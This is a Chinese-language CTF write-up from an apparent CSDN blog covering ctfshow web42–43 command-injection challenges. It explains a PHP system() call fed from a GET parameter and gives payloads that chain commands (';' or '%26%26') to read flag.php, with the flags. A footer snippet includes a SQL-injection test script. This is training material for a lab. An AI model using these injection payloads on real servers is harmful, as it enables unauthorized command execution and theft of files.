【CTFWP】ctfshow-web42-52

原创 已于 2024-08-01 08:44:49 修改 · 1.6k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络安全 #渗透测试 #CTF

于 2024-08-01 08:41:30 首次发布

文章目录

web42

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

题目分析:

这段 PHP 脚本是一个简单的 web shell,它允许通过 URL 参数 c 执行系统命令。如果 c 参数被设置,脚本将使用 system() 函数执行传入的命令,并将输出重定向到 /dev/null,这意味着命令的输出将被丢弃,不会显示给用户。如果 c 参数没有被设置,脚本将使用 highlight_file() 函数高亮显示当前脚本文件的内容。

这里是脚本的逐行解释:

  1. <?php:这是 PHP 代码的开始标记。
  2. if(isset($_GET['c'])){ :检查 URL 中是否有 c 参数。
  3. $c=$_GET['c'];:如果存在 c 参数,将其值赋给变量 $c
  4. system($c." >/dev/null 2>&1");:执行变量 $c 中的命令,并重定向标准输出和标准错误输出到 /dev/null
  5. }else{ :如果 c 参数不存在,执行下面的代码块。
  6. highlight_file(__FILE__);:显示当前脚本文件的内容,并高亮显示 PHP 代码。
  7. }:结束 else 代码块。
  8. ?>:这是 PHP 代码的结束标记。

system($c." >/dev/null 2>&1");具体解释

在 PHP 中,system() 函数用于执行一个命令并输出结果。这个函数的典型用法是:

system($command, &$output);

其中 $command 是要执行的命令字符串,$output 是一个变量,用于存储命令的输出。

在代码片段中:

system($c." >/dev/null 2>&1");

这行代码执行了以下操作:

  1. $c 是从 URL 参数 c 获取的值。这意味着如果有人访问这个脚本并提供了一个 c 参数,比如 c=ls,那么 $c 的值将是 ls

  2. $c." >/dev/null 2>&1"$c 与重定向操作符连接起来。这里的重定向操作符有两个部分:

    • >/dev/null:这将命令的标准输出(stdout)重定向到 /dev/null,这是一个特殊的文件,用于丢弃所有写入到它的数据。这相当于在命令行中使用 >/dev/null
    • 2>&1:这将命令的标准错误(stderr)重定向到标准输出(stdout)。由于标准输出已经被重定向到 /dev/null,因此标准错误也会被丢弃。

  3. system() 函数执行由 $c 和重定向操作符组成的命令串。由于使用了重定向,命令的输出和错误都不会显示在浏览器中,也不会保存在任何地方。

举例说明

假设有如下的 URL 访问:

http://example.com/script.php?c=ls

在这个例子中,$c 的值将是 ls,所以 system() 函数将执行以下命令:

ls >/dev/null 2>&1

这将在服务器上列出当前目录的内容,但由于使用了重定向,这些内容不会被显示给用户,也不会保存在任何地方。

黑洞(/dev/null)解释:

在 Unix 和类 Unix 系统中,/dev/null 是一个特殊的文件,它被称为“黑洞”,因为它会丢弃所有写入它的数据。这相当于一个数据的“下水道”,任何发送到 /dev/null 的数据都会被永久删除,不会有任何输出。

以下是一些关于 /dev/null 的说明:

  1. 丢弃数据:当你执行一个命令,并将输出重定向到 /dev/null,比如 command > /dev/null,这意味着命令的输出将不会被显示或保存。

  2. 安静运行:如果一个命令会产生大量输出,但你不需要这些输出,你可以使用 /dev/null 来让命令“安静”地运行。

  3. 错误处理:除了重定向标准输出到 /dev/null,你还可以将标准错误重定向到同一个地方,使用 2>&1 > /dev/null。这样,命令的错误信息也会被丢弃。

  4. 日志记录:在某些情况下,你可能想要运行一个脚本或程序,但又不希望它生成日志文件。通过将输出重定向到 /dev/null,你可以避免生成日志。

  5. 测试:在开发和测试过程中,如果输出不是必需的,使用 /dev/null 可以简化测试过程,专注于其他方面。

  6. 安全性:虽然 /dev/null 本身不涉及安全性问题,但使用它来丢弃可能包含敏感信息的输出可以避免潜在的安全风险。

  7. 环境变量:在 shell 脚本中,/dev/null 有时被用作环境变量,以确保命令不会影响输出。

  8. 系统调用:在编程中,/dev/null 可以作为系统调用的目标,比如在 C 语言中使用 open("/dev/null", "w") 打开一个文件描述符,用于写入数据。

总之,/dev/null 是一个用于丢弃数据的特殊文件,它在 Unix 和类 Unix 系统中广泛使用,以简化命令行操作和提高脚本的灵活性。

payload:

?c=tac flag.php;ls

payload解释:

采用双写绕过?c=tac flag.php;ls 这里呢,是把分号后面的ls写到黑洞里面去了,第一个tac就逃出来了

flag:

ctfshow{505e7f24-823d-4dd4-96f1-2edcdcc4877a}

web43

<?php
if(isset($_GET['c'])){
   
   
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
   
   
        system($c." >/dev/null 2>&1");
    }
}else{
   
   
    highlight_file(__FILE__);
}

题目解析:

  • 这个相比上题,过滤了分号

  • 除了分号,还可以用&&

  • 要url编码后使用 %26%26

payload:

?c=tac flag.php%26%26ls

flag:

ctfshow{3ff43859-a599-4f16-bcb4-957d4c22a578}

web44


                

                
                
        

    



  


        

            

                      
                        最低0.47元/天 解锁文章
                          
                      
            

        


    



                



	

		

			

				
					
CTFWPctfshow-web40

				
			

			

				

					LongL_GuYu的博客
				

				

					07-30
					
					1696
					
				

			

		

		

			
				
CTFWPctfshow-web40

			
		

	



                

            
              



	

		

			

				
					
CTFWPctfshow-web351-358

				
			

			

				

					LongL_GuYu的博客
				

				

					08-08
					
					1001
					
				

			

		

		

			
				
CTFWPctfshow-web351-358

			
		

	



              


  
              

                


	

		

			

				
					
CTFWPctfshow-web42

				
			

			

				

					LongL_GuYu的博客
				

				

					07-23
					
					1218
					
				

			

		

		

			
				
CTFWPctfshow-web42

			
		

	





	

		

			

				
					
CTF_WP-ctfshow-web题解

				
			

			

				

					qq_63600223的博客
				

				

					03-27
					
					997
					
				

			

		

		

			
				
注:初心只是为了记录自己的wp,其中也参考了许多大佬的博客,如有引用不当请告知。2024.3.27第一次修改,解决部分图片转存中问题以及目录跳转问题。

			
		

	



		

			
		



	

		

			

				
					
CTFWPctfshow-web32

				
			

			

				

					LongL_GuYu的博客
				

				

					07-26
					
					508
					
				

			

		

		

			
				
CTFWPctfshow-web32

			
		

	





	

		

			

				
					
CTFWPctfshow-萌新-web1-7

				
			

			

				

					LongL_GuYu的博客
				

				

					07-23
					
					962
					
				

			

		

		

			
				
CTFWPctfshow-萌新-web1-7

			
		

	





	

		

			

				
					
CTFWPctfshow-web36

				
			

			

				

					LongL_GuYu的博客
				

				

					07-24
					
					1534
					
				

			

		

		

			
				
CTFWP,ctfshow-web36

			
		

	





	

		

			

				
					
CTFShow-WEB入门篇--信息搜集详细Wp

				
			

			

				

					Aluxian_的博客
				

				

					06-02
					
					3222
					
				

			

		

		

			
				
CTFShow-WEB入门篇--信息搜集详细Wp


			
		

	





	

		

			

				
					
CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp

				
			

			

				

					2401_86436648的博客
				

				

					09-05
					
					611
					
				

			

		

		

			
				
函数返回数组中的当前元素(单元),默认取第一个值,函数返回一包含本地数字及货币格式信息的数组。

			
		

	





	

		

			

				
					
CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web

				
			

			

				

					2401_84297944的博客
				

				

					04-28
					
					1268
					
				

			

		

		

			
				
F12。

			
		

	





	

		

			

				
					
CTFshow-web入门-爆破(web21~28)WP

				
			

			

				

					Claire_cat的学习记录
				

				

					08-13
					
					878
					
				

			

		

		

			
				
在第二张图中,我们输入的账号是admin,密码是123456,得到了 YWRtaW46MTIzNDU2 ,放进cyberchef解密,发现账号密码的加密方法,即。附件给了密码字典,用字典里的密码登录admin管理员账户,密码太多了,想到用 bp 爆破。注意:php5 和 php7 的种子的随机数列不一样,题目环境是 php7。注意:php5 和 php7 的种子的随机数列不一样,题目环境是 php7。注意:php5 和 php7 的种子的随机数列不一样,题目环境是 php7。

			
		

	





	

		

			

				
					
空天地一体化边坡监测及安全预警系统

				
			

			

				

					GIS数据转换器的博客
				

				

					12-22
					
					629
					
				

			

		

		

			
				
摘要:2025年广西南横高速边坡预警系统通过"空天地一体化监测网络"(无人机、卫星、地面及深部传感器)实时捕捉毫米级位移,AI算法实现72小时超前预警,成功避免滑坡事故。该系统在矿山和高速公路应用中使事故率下降60%,运维成本降低35%,并逐步向"智能自愈"方向发展,构建从监测到应急的全生命周期安全管理体系。(149字)

			
		

	





	

		

			

				
					
网络安全中级阶段学习笔记(十):upload靶场实战(17关以及问题解决)

				
			

			

				

					2501_91976946的博客
				

				

					12-20
					
					868
					
				

			

		

		

			
				
本文介绍了upload靶场第17关的解题过程,重点探讨了绕过二次渲染的方法。作者最初尝试使用png图片木马失败,后发现只有gif图片才能找到未被渲染修改的相同编码区域。通过对比原图与渲染后图片的Hex码,找到不受影响的区域并替换为木马代码。具体步骤包括:上传gif图片马、下载渲染后的图片、用EmEditor工具对比编码、在相同区域插入木马代码并保持格式一致,最后重新上传修改后的文件。该方法成功绕过了二次渲染的防护机制,实现了文件包含漏洞的利用。

			
		

	





	

		

			

				
					
安全通用要求之六安全管理制度

				
			

			

				

					木矞的博客
				

				

					12-22
					
					250
					
				

			

		

		

			
				
2)应核查是否具有安全管理制度的审定或论证记录,如果对制度做过修订,核查是否有修订版本的安全管理制度。应核查网络安全工作的总体方针和安全策略文件是否明确机构安全工作的总体目标、范围、原则和各类安全策略。2)应核查安全管理制度的收发登记记录是否通过正式、有效的方式收发,如正式发文、领导签署和单位盖章等。应制定网络安全工作的总体方针和安全策略,阐明机构安全工作的总体目标、范围、原则和安全框架等。c)应形成由安全策略、管理制度、操作规程、记录表单等构成的全面的安全管理制度体系。

			
		

	





	

		

			

				
					
NET Core中ConcurrentDictionary详解:并发场景下的安全利器及服务端实践

				
			

			

				

					二十多岁的你迷茫又着急,想要车子,想要房子,想要享受旅行,你那么浮躁,拿什么看透人生!
				

				

					12-20
					
					963
					
				

			

		

		

			
				
ConcurrentDictionary<TKey, TValue>作为System.Collections.Concurrent命名空间下的并发安全集合,专为多线程场景设计,能极大简化并发处理逻辑。本文将从基础介绍、服务端并发用法、核心注意事项三个维度,带你全面掌握ConcurrentDictionary的实战技巧。

			
		

	





	

		

			

				
					
隐语——数据要素流通技术MOOC三期 课程笔记——数据流通安全治理:制度与技术的底层逻辑 学习笔记

				
			

			

				

					明月朗,潇水寒
				

				

					12-22
					
					485
					
				

			

		

		

			
				
本课程由清华大学王钺教授主讲,系统解析数据流通安全治理的核心问题与底层逻辑。课程首先梳理数据流通从信息化到要素化的四个演进阶段及其治理诉求,指出跨主体协同与市场化配置资源带来的新挑战。其次,重点区分数据安全与数据合规的差异,分析个人、公共和企业数据流通中的关键难题。课程提出治理的核心任务包括主体责任界定、数据分类分级和跨域协同监管,强调需通过技术(如隐私计算)、制度(如认证担保)和市场机制(如数据保险)协同推进。最后指出国家数据基础设施作为关键支撑,需实现数据内容、编目、授权和管控四大互通,构建安全与发展兼

			
		

	





	

		

			

				
					
mfc两个线程的创建、启动、安全结束实例

				
			

			

				

					weixin_42350092的博客
				

				

					12-21
					
					339
					
				

			

		

		

			
				
启动/停止线程1的按钮、启动/停止线程2的按钮、启动/停止所有线程的按钮。两个线程可以独立运行,执行不同的任务,并且可以分别控制或同时控制,具有良好的扩展性和可维护性。

			
		

	





	

		

			

				
					
人脸核身:从 “线下跑“ 到 “线上办“ 的安全基石

					
最新发布

				
			

			

				

					G3113542273的博客
				

				

					12-24
					
					263
					
				

			

		

		

			
				
-- ### 一、核心价值:从线下跑到线上办的关键跨越 1. 替代线下核验:以“真人+真证+本人操作”的三位一体验证,解决线上“谁在办、是不是本人”的信任难题,替代窗口人工核验,推动政务、金融、出行等场景全面线上化。- 金融服务:远程开户、信贷审批、大额转账、保险理赔,满足KYC合规要求,拦截冒用与欺诈。--- ### 四、安全与合规保障:数据与隐私双防护 1. 技术防护 - 活体升级:从动作活体到无感炫彩活体、3D结构光活体,防御精度达金融级,拦截率≥99.9%。

			
		

	





	

		

			

				
					
GZCVL T-II 安全防坠器测试系统

				
			

			

				

					2501_90323541的博客
				

				

					12-22
					
					586
					
				

			

		

		

			
				
GZCVL T-II 是广州文明机电自主研发的专业测试设备,严格遵循 GB10055-2007 等国标,适配多型号施工升降机防坠安全器。系统集成高精度机械结构与智能测控模块,可完成动作速度、制动性能、静态强度、耐久性等全维度测试,测量精度达 0.1% FS,支持自动化流程与数据溯源。其具备全工况模拟、多重安全防护及高兼容性优势,广泛应用于制造企业质量管控、特种设备检测机构校准、职业院校实训教学,为高空作业安全提供精准测试支撑,助力降低施工坠落风险。


			
		

	





	

		

			

				
					
CTFSHOW-web-web4

				
			

			

				

					12-27
				

			

		

		

			
				
### CTF SHOW Web 类别挑战资源与解决方案

对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞(LFI/RFI)等。

为了更好地理解和解决这些挑战,可以从以下几个方面入手:

#### 学习基础理论和技术
深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。

#### 利用在线学习资源
有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。

#### 参考社区讨论和Writeup
加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。

```python
import requests

def check_sql_injection(url, param):
    test_payload = "' OR '1'='1"
    data = {param: test_payload}
    response = requests.post(url, data=data)
    
    if "Welcome" in response.text:
        print(f"[+] SQL Injection vulnerability detected on parameter '{param}'!")
    else:
        print("[-] No SQL Injection found.")
```

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值